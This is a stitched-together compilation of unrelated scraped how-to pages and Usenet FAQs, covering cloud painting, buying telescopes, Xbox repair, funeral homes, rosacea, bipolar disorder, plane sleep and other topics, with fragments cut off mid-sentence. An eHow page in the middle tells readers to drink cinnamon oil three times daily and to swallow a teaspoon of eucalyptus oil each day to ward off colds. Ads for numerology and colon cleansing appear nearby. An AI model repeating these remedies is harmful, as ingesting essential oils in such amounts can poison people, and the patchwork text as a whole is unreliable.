(Left, cropped from a larger image.)I start with a ramp like the one on the right; be careful not to use full saturation here. Up to your preference,if you want to make the background a little more purple.

Start painting with max saturation and max value a 'peachy' color on a large default brush (sharp edge, pressure-sensitive opacity). Quickly block in the roughshapes where light would fall on your cloud.Take special care here (and any time you're painting something in nature) to not be too predictable, symmetrical or regular.

Go down in brush size and do some more detailed strokes.

The shadow color is added, a purple so dull it's almost gray. Then add the darker orange/red color whereverthe peach meets the shadow. Also, normally, cloudswill be brighter at the top so add it at the base too.

Now the highlight color, a slightly lighter peach. Usethe finest brush and squiggle it on wherever there's a left-hand facing edge of the cloud. Again,don't be predictable andregular.

(The best way is to study reference photos, for example this environmenttextures site has more than 1000 hi res photos in their "Sky" category.)

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You are here: BBC > Science & Nature > Space > My Space > Buying a Telescope


Patrick Moore's guide to buying a telescope

Telescopes suitable for astronomical use are either good or cheap, not both. The problem is that when faced with a substantial financial outlay, many people are so discouraged that they give up. Fortunately, there are some answers to this problem.

There are two types of astronomical telescopes. In a refractor, the light from the object to be studied is collected by a lens (object glass) and brought to focus. Here the image is magnified by a second lens, known as the eyepiece. In a reflector, the light is collected by a specially shaped mirror and reflected back up the tube. Then the light is brought to focus and, as before, magnified by an eyepiece. This is the Newtonian form of reflector, there are other variants.

Refracting telescopesFirst, let us consider the refractor. The main emphasis would be upon aperture - that is to say, thediameter of the object glass, which is the light collector. All the actual magnification is done by the eyepiece. But only a certain amount of light is available, so that too high a power cannot be used.

In my opinion (and others will not agree!) the maximum really useful power for magnification is x50 per inch of aperture. That is to say, if you have a 3-inch refractor (object-glass 3 inches in diameter), you can use a power of 3x50=150. So the object will be enlarged 150 times as compared with the naked-eye view. You can, in theory, use a higher magnification - say x300 - but the image will be so faint that it will be quite useless.

Reflecting telescopesWith a reflector of the Newtonian types, the aperture is the diameter ofthe mirror. Again, the rule of thumb is x50 per inch of aperture. Though it must be said that inch for inch the reflector is less efficient (because light from the target objects has to undergo several reflections). There are various other patterns that use both mirrors and lenses, and these can be excellent. But, unfortunately, they are very expensive.

If you want to buy a telescope, my own view - and again I must stress that this is a personal opinion - is that it is not sensible to pay a large sum for any refractor with an object-glass less than 3 inches in diameter, or a Newtonian reflector with a mirror less than 6 inches across.

Smaller telescopes just do not give enough light to be really useful astronomically. The prices are, alas, rather high. The following gives a guide as to what to expect to pay for a suitably mounted telescope:

3 inch refractor on an altazimuth mount from £4953 inch refractor on an equatorial mount from £5956 inch reflector on an equatorial mount from £5958.75 inch reflector on an equatorial mount from £895

An altazimuth is a simple mounting, on which a telescope can be moved freely in any direction. An equatorial is more complicated, and means that only one motion is necessary (east/west). For astronomical photography, an equatorial is more or less essential.

Seeing starsFor observations of stars, aperture is again the essential factor; themore light you can collect, the fainter objects you can see. Consider, for example, the Pleiades star-cluster. With the naked eye, you can see roughly seven stars. Any telescope will show dozens.

I am not suggesting that a very small telescope is quite useless. Of course it isn't. What I am saying is that in my opinion, it is not satisfactory for anything but the most casual observation. Rather than spend a large sum of money (several tens of pounds) on a very small

telescope it is, I feel, much better to buy a good pair of binoculars.

BinocularsThey are defined by the apertures of the object-glasses (in mm) and the magnifications. Thus a

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How to Fix a Red Ring of Death - Mahalo http://www.mahalo.com/How_to_Fix_a_Red_Ring_of_Death

1 3 19/4/2008 2:47

How to Fix a Red Ring of DeathAlso try: Xbox 360 Repair | Xbox 360

Wondering what the Red Ring of Death Is?

Guide Note: The "Red Ring of Death" is a potential technical problem with the hardware of the Xbox 360.

Fast Facts:

Xbox 360 Support Center: 1-800-4MY-XBOX1.Hours: 9AM - 1AM EST2.

Causes and Fixes for the Red Ring of Death

How to Avoid the Red Ring of Death

To help prevent a "Red Ring of Death" from happening to your Xbox 360, remember these things:

Avoid putting your Xbox 360 on carpet.1.Do not move your Xbox 360 when the power is on.2.Keep the console in a well-ventilated area.3.Purchase a warranty with your console to plan ahead for technical issues.4.

The "Towel" Method

A popular solution across the world wide web is the "towel" method, which involves wrapping your Xbox 360 in towels and leaving it for about 20 minutes. Although this can provide a temporary fix, itonly promotes further overheating and more problems down the line.

Hackszine.com: HOWTO - Fix a "Red Ring of Death" Xbox 360Engadget: "Towel trick" provides temporary fix to red ring of doom?XBox 360 Rally: The Red Ring of Death... Cure Found!YouTube: Fix an Xbox 360 with Red Ring of Death!

Opening the Console

If you are technically inclined, there are methods of opening up your Xbox 360 and fixing the issueyourself. This voids your warranty,so be extremely cautious when making the decision to take your Xbox 360 apart.

Ars Technica: Save your 360 from the dreaded red lights

Let The Pros Handle It

Probably your best bet when facing the dreaded red lights is to send it to the Xbox 360 support team for repair. If your unit is not under warranty, this will cost around $140. You can call them at1-800-4MY-XBOX for more details (9AM - 1AM EST).

Team Xbox: The Red Ring of DeathKotaku: A Dozen Xbox 360s, One Man's Tale of Woe

How to Choose a Funeral Home - Mahalo http://www.mahalo.com/How_to_Choose_a_Funeral_Home

1 4 19/4/2008 2:31

How to Choose a Funeral HomeAlso try: How to Plan a Funeral

Guide Note:

Thanks in large part to the Federal Trade Commission's Funeral Rule, choosing a funeral home doesn't have to be a difficult or overly-stressful endeavor.

How to Choose a Funeral Home will guide you through selecting the best funeral home for your needs.

How to Choose a Funeral Home

(Photo by Niels Rameckers)You are not legally obligated to work with a funeral home or director, but most people find it easier to have a professional help them deal with the logistics surrounding a death.

A funeral directorwill walk you through the entire funeral procedure. Funeral directors can help procure copies of the deceased's death certificate, write an obituary, help you follow any religious observances, contact social security, make arrangements with a crematorium, etc. The funeral home, itself, is where the body is prepared and is often times the site of the actual funeral service.

Unless you've made arrangements beforehand, you will probably be forced to choose a funeral home quickly and under great emotional duress. Hopefully, you will be able to get a recommendation from a trusted friend or clergy member. Whether you are working with a recommended mortuary or not, it's crucial that you understand your rights when entering into a relationship with a funeral home.

The Funeral Rule

The Federal Trade Commission (FTC) is the nation's consumer protection agency and enforcer of the Funeral Rule. The Funeral Ruleallows consumers to compare prices between funeral homes and select which of the home's services you wish to use without being pressured into buying a "package" of any kind.

The Funeral Rule entitles you to the following:

Buy Only the Funeral Arrangements You Want: You do not have to purchase a "package" of goodsand services from a funeral home. You can purchase funeral goods, such as a casket, from an outside


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4 Telescope Making Basics

4.1 Choosing a Telescope

The choice of which telescope to make depends on many things among which arethe kind of observing you want to do and the optical and mechanical characteris-tics that kind of observing program requires, your financial resources, and theamount of time you have available to devote to the project.

4.1.1 Your MotivationBefore undertaking the construction of a telescope, ask yourself some questions.A beginner who wants an initiation into the techniques of mirror-making andwants to have a good-quality instrument is well-advised to start by making asmall-diameter telescope—the 130-mm which is described in Chapter 6 beginningon page 85. This inexpensive instrument will enable you to begin your discoveryof celestial objects. It is simple to make and does not present any major technicaldifficulties.1

The passionate amateur astronomer who wants to explore the techniques ofmaking paraboloidal, flat, or hyperbolically (convex) mirrors should choose an in-strument like the 250-mm (see Chapter 12 beginning on page 149) or 300-mm (seeChapter 19 beginning on page 205) telescopes. These instruments are capable ofhigh-quality performance in visual observation, photography, or CCD imaging.However, their construction demands a sizeable personal investment—several op-tical pieces are required, some of them very complex. It is almost always not a

1 American amateurs may find 130 mm in between the sizes of available blanks. Either a 4.25-inch (108 mm) or a6-inch (152 mm) will serve for this simple example.

Can you observe in the city?

The night sky of large cities is polluted by light, dust and aerosols. In thelargest cities, only stars brighter than magnitude 4 are visible to the nakedeye (at the zenith). The Milky Way and most deep-sky objects are invisi-ble. One can observe bright objects or use special filters (LPR, OIII) to im-prove the contrast of certain nebulae. On the other hand, observation ofmost planets, the Moon and the Sun is possible without difficulty. Theseimages are often better (with regard to turbulence) in cities than in thecountry. The layer of air over a city can often be quite stable, whereas inthe country it is often humid and turbulent.

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alt.lefthanders Frequently Asked QuestionsThere are reader questions on this

topic!Help others by sharing your


Sender: [email protected]: [email protected] (Barry D. Benowitz)Newsgroups: alt.lefthandersSubject: alt.lefthanders Frequently Asked QuestionsMessage-ID: <[email protected]>Reply-To: [email protected] (Barry D. Benowitz)Keywords: FAQ LEFT LEFTIEX-Posting-Frequency: posted on the 9th of each monthX-Content-Currency: This FAQ changes regularly. When a saved or printed copy is over 6 months old, please obtain a new one.User-Agent: Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Canyonlands)Date: 09 Jan 2001 09:55:30 -0500

Posted-By: auto-faq lefty-faq


I Table of Contents Welcome Introduction Credits Frequently Asked Questions Questions and Answers

II Welcome

Welcome to official Usenet Guide to Frequently Asked Questions for theLeft-Handed Population. It is posted periodically to the alt.lefthandersnewsgroup and the general newsgroups alt.answers and news.answers. It isavailable via anonymous ftp from:

ftp://ftp.cs.ruu.nl/pub/NEWS.ANSWERS/ /ftp@ftp://mirrors.aol.com/pub/rtfm/usenet/alt.lefthanders/

Also, you can find a URL version on the World Wide Web at:


III Introduction

There exists in the world a very special group of individuals who is lefthanded. This group has had to spend its life conforming to a world thatwas not designed for its benefit. In addition, this group has had to putup with insults and derogatory comments aimed in its direction. The intentof this document is to provide a source of information for the left-handed population and to serve as a consciousness raising tool aboutissues of special concern for lefties for the population in general. Itis sincerely hoped that it serves its goal.

IV Credits

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Amateur's guide to proving the four color theoremFrom Wikibooks, the open-content textbooks collection

Although technically the Four Color Theoremhas been proven, for some -- professionals and amateurs alike -- attempting to discover a more elegant solution to the Four Color Theorem is an engrossing pastime. In theory nothing more than a pencil, some paper, and some thought should be required.


It is easier to work with graphs than maps. Maps are equivalent to their duals, which are planar graphs. Eachregion corresponds to a vertex and borders between regions correspond to edges. Borders without length aredisregarded.It is assumed that it will be easier to prove the Four Color Theorem for fully-triangulated planar graphs. A planar graph which is not fully-triangulated (i.e. it is missing some edges) can easily be made fully-triangulated by adding some edges. Then, after a 4 coloring is found, those additional edges can be removed. However, if you're attempting to solve the Four Color Theorem as a route to solving P = NP, note that it is the finding of a 3-coloring of a [possibly non-fully-triangulated] graph -- or proving that such a 3-coloring does not exist -- that is hard.The dual of a fully-triangulated planar graph is a cubic planar graph. Cubic means that every vertex has 3 edges. However, not every cubic planar graph has a Hamiltonian cycle -- if it did it would prove the Four Color Theorem. For examples of cubic planar graphs without a hamiltonian see: Tutte's counter-example with 46 vertices and 60 edges; Kozyrev and Grinberg's counter-example with 44 vertices; and Lederberg's orBarnette and Bosák's counter-example with 38 vertices.


Here are some of the common pitfalls for the beginner:

Not every graph can be generated by starting with a triangle and adding 1 vertex and 3 edges i.e. keeping thegraph fully triangulated as each vertex is added. The smallest graph with minimum degree 4 has 6 vertexes. The smallest graph with minimum degree 5 has 12 vertexes.


The Four Color Theorem is equivalent to finding a Bi-BiPartite solution. In other words it is sufficient to separate the vertexes into just 2 sets -- if each set is itself BiPartite. This is actually a simplification because it is clear what makes a graph BiPartite: no odd cycles. If the graph can be decomposed into 2 subgraphs such that each subgraph has only even cycles or no cycles, a solution has been found.

The Four Color Theorem can be equivalent to finding a solution to an equation or a set of equations and may be easier to work with in matrix form.

The simplest equation is of the form (A-B)(A-C)... != 0 where A,B,C,... represent the colors of the vertexes. If 2vertexes are adjacent than their values are subtracted. It thus becomes a 'satisfiability problem' in that values for A,B,C... must be found that 'satisfy' the inequality. If two adjacent vertexes have the same color then their difference is 0 and the entire equation yields 0. Inequalities are not easy to solve using matrix.

Minimum Counter Example to the Four Color Theorem

The 4CT essentially says that "the vertices of a planar graph may be colored with no more than four different colors."

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3D CAD Resources | AutoCAD - Tutorial - How to set your block au... http://www.3dcadresources.com/autocad_tipsandtricks_How_to_set_y...

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How to set your block automatically insert at your dimscale?

Written by RickyTuesday, 14 November 2006

There is a simple way to set your block automatically insert at your dimscale, while using Tool Palettes to insert blocks. Follow the procedure as shown below:

1) After opening AutoCAD right click on the block in tool palette and select properties from the list as shown in Figure 1.

Figure 1.

2) When the Tool Properties dailogue box opens, set Auxillary scale to Dimscale as shown in Figure 2. Then just drag and drop the block into your drawing, and they will scale to your dimscale.

Figure 2.

Note: You can as well have them set to your plotscale.



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How to Sleep On a Plane - Mahalo http://www.mahalo.com/How_to_Sleep_On_a_Plane

1 4 19/4/2008 2:45

How to Sleep On a PlaneDisclaimer:The content in this page is not a substitute for professional medical advice. Please consult your doctor for more information on how to sleep on a plane.

Guide Note: When traveling across time zones, sleeping in-flight can be one method to help overcome jet lag. Here are some tips to help you get some sleep while in the air.

Step 1: Book the right seat

A window seat gives you a wall to lean on. (Creative Commonsphoto by Stereogab)

Certain seats on airplanes are more conducive to sleep. These simple tips will help you book a seat where you are most likely to sleep.

If you sit next to a window, you will have a wall to lean on as you sleep.1.You also will not have to move if someone else needs to use the restroom.2.Don't sit in the last row; these seats often do not recline.3.Seats in front of the exit row also often do not recline.4.The further forward you sit, the further away from engine noise you will be.5.Exit rows will give you more legroom, but you will not be able to put the seat arms up if the seat next to you is empty. Also, you will have to be alert if there is an air incident.


The website Seatguru.com can help you select the best seat.7.

Step 2: Prepare before your flight

Avoid alcohol before flight. (Photo by Christy Thompson)

Good preparation is one key to solid in-flight sleep.

Wear loose clothing so you will not feel constricted.1.Wear layers; you can add or remove them depending on the temperature on the plane.2.Don't consume caffeinein the four hours before your flight. According to Canada's Centre for Addiction and Mental health, ittakes four and a half hours for your body to metabolize caffeine.


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How To Ask Questions The Smart Way http://catb.org/~esr/faqs/smart-questions.html

1 20 8/4/2008 9:19

How To Ask Questions The Smart Way

Eric Steven Raymond

Thyrsus Enterprises

<[email protected]>

Rick Moen

<[email protected]>

Copyright © 2001,2006 Eric S. Raymond, Rick Moen

Revision HistoryRevision 3.6 19 Mar 2008 esrMinor update and new links.Revision 3.5 2 Jan 2008 esrTypo fix and some translation links.Revision 3.4 24 Mar 2007 esrNew section, "When asking about code".Revision 3.3 29 Sep 2006 esrFolded in a good suggestion from Kai Niggemann.Revision 3.2 10 Jan 2006 esrFolded in edits from Rick Moen.Revision 3.1 28 Oct 2004 esrDocument 'Google is your friend!'Revision 3.0 2 Feb 2004 esrMajor addition of stuff about proper etiquette on Web forums.

Table of Contents

TranslationsDisclaimerIntroductionBefore You AskWhen You Ask

Choose your forum carefullyWeb and IRC forums directed towards newbies often give the quickest responseAs a second step, use project mailing listsUse meaningful, specific subject headersMake it easy to replyWrite in clear, grammatical, correctly-spelled languageSend questions in accessible, standard formats

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Summary How To Solve It


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Jimmy : ..

.. (from May 20 2003 - June 15, 2003)

Always use your own brain first.

1 How To Solve It : List #

First : Understanding the Problem

You have to understand the problem.What is the unknown?What are the data?What is the condition?

Second : Devising a Plan

Find the connection between the data and the unknown.

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Giant LED Halloween Costume - Instructables - DIY, How To, craft, tech http://www.instructables.com/id/Giant-LED-Halloween-Costume/

1 2 4/4/2008 10:54

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Nov 8, 2007. 8:15 PM

Giant LED Halloween Costumeby corbett on Oct 31, 2007 in CRAFT & TECH email it!

intro Giant LED Halloween Costume-thick armature wire (20ft)-cellophane (10ft)-cardboard box-aluminum foil (4ft)-wire cutters-clear packing tape-knife-grey tights for leads (optional)-flashlight/actual LEDs to light inside (optional)

Cut the box down so that there's only 5 inches left. Cut a hole for your waist by taking a belt and tracing the circular outline, then cutting. Create skeleton with armature wire, by going corner to corner and taping. Cover in cellophane, taping from the inside where possible. Cover the box in aluminum foil Put on your tights and go lightup the world.

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Ha ha! That is so cute.


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led light saber/ glow stickentry for led contest parts 3 LEDS(same color), bic pen, pill bottle, 9vbatte…by stallsworth

LED FLASHLIGHT MADE OF A M…LEARN HOW TO BUILD IN LESSTHAN 5 MINUTES A LEDFLASHLIGHT USING AMATCH-BOX. S…by YEPPRODUCTIONSHow to replace the white LE…Hi, In this simple instructable I amgoing to teach you how to replace thewhite L…by joejoerowley

How To Extract LEDs From LE…This Instructable will cover theextraction of LEDs from molded LEDChristmas ligh…by kelor90

Spinning LEDs (or LED lit fan)While wondering what kind ofInstructable I should make I cameacross some LEDs. W…by Sunbanks

Blue LED Flashlight ModHere's a quick 10 minute hack to turnan ordinary white LED flashlight intoa much…by Deadly Computer

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Rosacea Frequently Asked Questions v1.15 http://www.faqs.org/faqs/medicine/rosacea/

1 9 11/4/2008 2:09

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Rosacea Frequently Asked Questions v1.15There are reader questions on this

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From: David Pascoe <[email protected]>Newsgroups: alt.skincare.acne, alt.support.skin-diseases, alt.skincare,sci.med, sci.med.visionSubject: Rosacea Frequently Asked Questions v1.15Date: Wed, 07 Apr 2004 16:22:13 +0800Message-ID: <[email protected]>

Archive-name: medicine/rosaceaPosting-Frequency: monthlyLast-modified: 2003/01/16Version: 1.15URL: http://rosacea.ii.net/faq.txtMaintainer: David Pascoe <[email protected]>

CVS Version: $Id: faq.txt,v 1.15 2003/01/16 08:45:11 anonymous Exp $

----------------------------------------------------------------------------Disclaimer: the following information is a guide only. Self diagnosis is adangerous pastime without all of the information. This Frequently AskedQuestions is a simple guide to rosacea, and a pointer to more information.This text should not be used in the place of professional advice fromregistered practitioners.----------------------------------------------------------------------------

1. What is Rosacea ?

Rosacea (said rose-ay-shah) is a potentially progressive neurovasculardisorder that generally affects the facial skin and eyes.

The most common symptoms include facial redness and inflammation acrossthe flushing zone - usually the nose, cheeks, chin and forehead ; visiblydilated blood vessels, facial swelling and burning sensations, andinflammatory papules and pustules.

Rosacea can develop gradually as mild episodes of facial blushing orflushing which, over time, may lead to a permanently red face.

Ocular rosacea can affect both the eye surface and eyelid. Symptoms caninclude redness, dry eyes, foreign body sensations, sensitivity ofthe eye surface, burning sensations and eyelid symptoms such as chalazia,styes, redness, crusting and loss of eyelashes.

A panel of experts have agreed on a standard classification system forRosacea. This system is a brief text that is not intended to beexhaustive, but is a place to start.

Their classification system was published in the Journal of AmericanAcademy of Dermatology (United States), Apr 2002, 46(4) p584-7)

"Rosacea is a chronic cutaneous disorder, primarily of the central face.It is often characterized by remission and exacerbation and it encompassesvarious combinations of such cutaneous signs as flush, erythema,telangiectasias, edema, papules, pustules, ocular lesions, and rhinophyma.Primary features considered as necessary for diagnosis include flushing,erythema, papules, pustules, and telangiectasias. A variety of secondaryfeatures are listed that may be absent or present as a single finding orin any combination."

Say “Thank you” with meaning. Many times people feel that the proper way to accept a compliment is to try to water -it down with disqualifying comments like, “If you only knew…” or “Well, thanks for saying it even if it isn’t true.” This is -both rude to the person giving the compliment and unappreciative--they have noticed something nice about you.

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Our original destination was this moraine lake on the east side of BrokenTop. A moraine is a pile of rocks and debris created by glacial movement

that oftentimes creates a bowl where water collects and eventually forms alake.

Elevation: 1500 foot elevation gain

Trail distance: Approximately 10 miles round trip

Rated: Easy to moderate

Latitude: 44.0575

Longitude: 121.70722

Directions: From Bend take Century Drive toward Mt. Bachelor, which turns into Cas-cade Lakes Hwy. Just past Mt. Bachelor watch for the signs to Todd Lake; turn right and travel .6 mile on a washboardy road to the Todd Lake parking lot. Continue on for 2.6 miles on a narrow rutted road with large rocks, and then veer left at the “Y” for another 1/2 mile to the end of the road. Behind and to the right of the Forest Service kiosk, climb a small embankment to find the path that follows Crater Ditch.

Fees: $5 fee or NW Forest Pass

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CG World 3d Tutorials

Tutorial for creating dreamworks a-like clouds using UltraShock

- Start 3D Studio Max.- In File-Preferences set units to ‘centimeters’.

Create a particle system:- In the Top-view, draw a PCloud-particle-system with length: 200, width: 200 and height: 25.With Transform type-in set the PCloud at (0, 0, 0).- In Modify, change ‘Use Total’ to ‘Use Rate’: 14.

Create a camera:- In the Top-view, make a camera at (0, -100, 0) and the camera-target at (0, 0, 0).- In the Right-view, move the Camera 30 units up along the Y-axis and the Camera-target 20 units up along the Y-axis.

Create a light:- In the Top-view, set an UltraShock Omni at (0, 200, 0) (Make sure you don’t select a standard omni !).- In the Right-view, move the omni 80 units up along the Y-axis.- Modify the omni’s color to RGB: 180, 180, 190.

Create the UltraShock-helper:-In the Top-view, create an UltraShock-helper, assign the Pcloud as particle-system.

You should get a scene like shown below.

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Jelly Doughnut Surprise - Instructables - DIY, How To, food, offbeat http://www.instructables.com/id/Jelly-Doughnut-Suprise/

1 4 12/4/2008 6:45

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Apr 11, 2008. 4:16 PM

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Apr 9, 2008. 5:13 PM

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Jelly Doughnut Surpriseby rogers236 on Mar 29, 2008 in FOOD & OFFBEAT email it!

intro Jelly Doughnut SurpriseIt looks like a tasty jelly doughnut, but it's really a mustard(or ketchup) filled surprise!

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the source >:Dvery evil!

I can't wait to try this one on my kids! lol!

hehe mixed the jelly whit tabasco :D Big suprise :P

omg thats great,

What.... i do this anyway to make them taste betteri've never heard of it being used as a prank?

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Ye Olde Aprile Fools Prankes!Hark men and wenches and childrenof all ages! Enscribed within thistome is the …by Jieze

April Fool's Joke: Trick a …Well, lots of people have at least onefriend that they tell lots of things,inclu…by CLASSIFIEDINFORMATION

Dummy Prank!! (April Fools)How to set up a dummy...literally. by greeenpro

April Fools: Write on the w…Great Prank! "write on the wall"! Nowdoesn't that look like you wrote o…by lawizeg

April Fool: The World's Sim…This instructable details a simplestupid trick that takes 30 seconds toset up, y…by sysadmn

Virus PrankThis will freak out your friends orwhoever you do it to! They will thinkthat the…by Shadow Dragon

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How To Explain the Origins of Kwanzaa | eHow.com http://www.ehow.com/how_2065017_explain-origins-kwanzaa.html

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Instructions Difficulty: Moderate

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How to Explain the Origins of KwanzaaBy eHow Holidays & Celebrations Editor

Rate: (1 Ratings)

Explain the origins of Kwanzaa to your family and friends before the celebrationoccurs. While others are bustling with Christmas, Hanukkah and New Years, you can dig deep within yourself, enlightening your mind to the culture of your ancestors. Kwanzaa is a celebration of African family, culture and community and a beginning step in acquainting all Africans from around the world with their original heritage.

Step 1:Study the origins of Kwanzaa in the harvest celebrations in Africa. In 1966,California State University professor Dr. Maulana Karenga decided to introducean African tradition that had been recorded in various forms since the times of ancient Egypt and Nubia. This tradition was known as a "first fruit" celebration, which is where Dr. Karenga got the name (Kwanzaa means first fruits inSwahili).

Step 2:Explain that Kwanzaa is derived from the five fundamentals of the continent ofAfrica. These fundamentals are: ingathering, reverence, commemoration, recommitment and celebration. Dr. Karenga established seven fundamentals; them Umoja (unity), Kujichagulia (self-determination), Ujima (collective work and responsibility), Ujamaa (cooperative economics), Nia (purpose), Kuumba (creativity) and Imani (faith).

Step 3:Describe the fact that Kwanzaa retains characteristics from many differenttribes. It attempts to bring all of these African cultures together, reuniting the heritage shared by all people of African descent.

Step 4:Point out the struggles, victories, separations and achievements your Africanancestors have been through in order to allow you to live as you are living today. Taking time to honor and appreciate these ancestors is part of the celebration of Kwanzaa.

Step 5:Discover your rootedness in African culture. Kwanzaa stresses the importanceof reconnecting to your roots and origins. You should explain to your children the rich history they have in the world.

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This is Scary AccurateSee Why the Amazing Truth of Your Numerology Chart Cannot Tell A Lie!Numerologist.com

Kwanzaa begins on December 26 and ends on January 1.

Each of the 7 days of Kwanzaa is devoted to a different principle.

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Make a Super Bouncy Ball: Materials needed - Instructables - DIY, H... http://www.instructables.com/id/SNI989KFB7FBTL9/

1 2 8/4/2008 9:56

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Jan 18, 2008. 1:52 PM

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Jan 18, 2008. 2:25 PM

Make a Super Bouncy Ballby pudi.dk on Jan 9, 2008 in KIDS & OFFBEAT email it!

step 1 Materials neededThis bouncy ball is made using a reaction between the two following chemicals:

- Alcohol (Ethanol) - You should be able to get this at any supermarket.- Water glass (Sodium silicate) - Pretty easy to find at ceramic supply stores drug stores and hardware stores. I buy mine for about 3$ per 1/2 litre.

You will also need:

- Disposable rubber gloves- 2 small beakers- Popsicle stick

... and that's it! Now that wasn't so bad at all, was it?

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petrosmoris INBOX (0) logout | Help



Woops, thanks for the head up!I fixed it, I hope my mistake hasn't killed too many people.

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Blue Flaming PineconesAre you a pyromaniac? Do you enjoysetting things on fire, yet feelartistically c…by talbotron22

How to Juggle: the 3-ball c…Someone recently requested anInstructable on how to juggle, so Ithought I'd take…by Llama Nerds

How to Make Super-Cool Froz…Use liquid nitrogen to makeawesome frozen party drinks. Liquidnitrogen is cold …by ewilhelm

Hydrate Video LabThis experiment is intended tointroduce students to hydratedcompounds. These com…by kentchemistry.com

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views: 25.479

category: kids & offbeat

keywords: super, bouncy, juggle, science, fun, experiment, kids, children, alcohol, water, glass, waterglass, chemistry, chemicals, ball, bouncyball

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author: pudi.dk

published: Jan 9, 2008featured by: fungus amungus

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Start Your Own Travel Agency Worldwide, over a trillion dollars are spent on travel each year; over six billion in North America alone. Travel was the second largest employer in the U.S. and Canada, supporting over 6 million jobs. Travel represented 7% of the U.S. and Canadian Gross National Product. 65% of U.S. and Canadian residents took at least one trip over 100 miles. Nearly 42,000 travel agencies averaged $22,500 each week in airline ticket sales. Agencies book an additional 40% in tours, cruises, hotels, etc., therefore making the average travel agency volume $1,500,000, according to the U.S. Department of Commerce. Net profits average 4% to 5%, making the potential net profit in a travel agency $60,000 to $70,000. The travel industry has been growing even during the recent recession and is now experiencing unprecedented growth worldwide. You can start your own travel agency, which can be operated from your home, for under $10,000, including required training, operations manuals, reservations software and access to the airlines reservations computers, and initial supplies (stationery, posters, brochures). These services are provided as part of a package by TPI Travel Services, who also provide a TPI photo ID card for immediate free and reduced rate travel benefits. You also receive the right to use the TPI name and its trademarks. This will make it much easier for you to obtain high profit commercial accounts, as they supply you with references of existing accounts serviced by TPI. The commissions are also higher than you would receive as an independent travel agent, because TPI has volume contracts with airlines, cruise lines, and other suppliers and passes the increased commission on to its agencies. This is one of the easiest ways to get into the travel agency business, and is a fraction of the cost of doing it independently. If an investment of this size is in your budget, you’ll want to look into this opportunity, as starting a travel agency from scratch can easily cost $25,000 to $50,000. If you can’t afford an investment this large, you might want to get one or more partners to share the deal with you. Another successful strategy can be to line up commitments from one or two large business customers for their travel needs, and then use those commitments to make the investment more interesting to a partner.

How To avoid a cold with cinnamon. | eHow.com http://www.ehow.com/how_2237540_avoid-cold-cinnamon.html

1 2 22/4/2008 4:22

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avoid a cold with cinnamon.

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joni123 said Flag This Comment

WriterGig said Flag This Comment

How to avoid a cold with cinnamon.By AmyJaine

Rate: (2 Ratings)

Does everyone in you office have a cold? Or worse doeseveryone else in your household have a cold? You needto be at work and you need to be there for you family, I know, I have been there. Learn the simple to way to wardof a cold. There is more you can do then just drink orangejuice.

Things You’ll Need:

Cinnamon oil.Water.

Add five drops of cinnamon oil to a tablespoon of water.

Drink the mixture.

Repeat three times a day until, threat of a cold has gone.

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Natural MedicineColon cleansing kit. Gently removes toxins in your body. View photos.MarthaVolchok.com

Taking a teaspoon of eucalyptus oil a day and holding it in your mouth forten minutes before swallowing, has also been known to hold of a cold.

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on 3/22/2008 Cinnamon also is common in craft and health food stores.

on 3/20/2008 Thanks for the tips! Where do you buy cinnamon oil?

DrJewell,Meet DrJewell eHow’s HealthExpert.

Related AdsCinnamon DietNatural OilsOil BurnersSinus Homeopathic RemedyIncense OilCough and Cold Remedy

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Bipolar Disorder FAQ v 1.1 (2 of 4) http://www.faqs.org/faqs/support/depression/bipolar-faq/part2/

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Bipolar Disorder FAQ v 1.1 (2 of 4)There are reader questions on this

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From: [email protected] (Barry Campbell)Newsgroups: soc.support.depression.manic, alt.support.depression.manicSubject: Bipolar Disorder FAQ v 1.1 (2 of 4)Date: 25 Sep 1996 15:04:18 GMTMessage-ID: <[email protected]>Summary: This article contains information about Bipolar Disorder, based on contributions by readers and participants in Usenet support groups.Archive-name: support/depression/bipolar-faq/part2Posting-Frequency: monthly


Continued from Part 1...

--------------------------3.10 What is Cyclothymia?--------------------------


Diagnostic Criteria for Cyclothymic Disorder (DSM-IV, p. 365)

A. For at least 2 years, the presence of numerous periods with hypomanicsymptoms and numerous periods with depressive symptoms that do not meetcriteria for a Major Depressive Episode. Note: In children and adolescents,the duration must be at least 1 year.

B. During the above 2-year period (1 year in children and adolescents), theperson has not been without the symptoms in Criterion A for more than 2 monthsat a time.

C. No Major Depressive Episode, Manic Episode, or Mixed Episode has beenpresent during the first 2 years of the disturbance.

Note: After the initial 2 years (1 year in children and adolescents) ofCyclothymic Disorder, there may be superimposed Manic or Mixed Episodes (inwhich case both Bipolar I Disorder and Cyclothymic Disorder may be diagnosed)or Major Depressive Episodes (in which case both Bipolar II Disorder andCyclothymic Disorder may be diagnosed).

D. The symptoms in Criterion A are not better accounted for by SchizoaffectiveDisorder and are not superimposed on Schizophrenia, Schizophreniform Disorder,Delusional Disorder, or Psychotic Disorder Not Otherwise Specified.

E. The symptoms are not due to the direct physiological effects of a substance(e.g., a drug of abuse, a medication, or other treatment) or a general medicalcondition (e.g., hyperthyroidism).

F. The symptoms cause clinically significant distress or impairment in social,occupational, or other important areas of functioning.


How Can I Lose Weight Safely? http://www.kidshealth.com/teen/food_fitness/dieting/lose_weight_safe...

1 4 22/4/2008 4:05

KidsHealth > Teens > Food & Fitness > Healthy Weight > How Can I

Lose Weight Safely?

Weight loss is a tricky topic. Lots of peopleare unhappy with their present weight, butmost aren't sure how to change it — andmany would be better off staying where they are. You may wantto look like the models or actors in magazines and on TV, butthose goals might not be healthy or realistic for you. Besides, nomagical diet or pill will make you look like someone else.

So what should you do about weight control?

Being healthy is really about being at a weight that is right for you. The best way to find out if you are at a healthy weight or if you need to lose or gain weight is to talk to a doctor or dietitian, who can compare your weight with healthy norms to help you set realistic goals. If it turns out that you can benefit from weight loss, then you can follow a few of the simple suggestions listed below to get started.

Weight management is about long-term success. People who lose weight quickly by crash dieting or other extreme measures usually gain back all (and often more) of the pounds they lost because they haven't permanently changed their habits. Therefore, the best weight-management strategies are those that you can maintain for a lifetime. That's a long time, so we'll try to keep these suggestions as easy as possible!

Make it a family affair. Askyour mom or dad to lend helpand support and to makedietary or lifestyle changes thatwill benefit the whole family, ifpossible. Teens who have the support of their families tend to

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How to Defer Student Loans - Mahalo http://www.mahalo.com/How_to_Defer_Student_Loans

1 4 19/4/2008 2:25

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How to Defer Student LoansBy TracyAlso try: How to Reduce Student Loan Debt

Guide Note:Whether you are going back to school or are suffering a financial hardship, you may need to defer payments on your student loans until your situation has changed. Our guide, How to Defer Student Loans, will help you through the process of requesting a deferment from your lender.

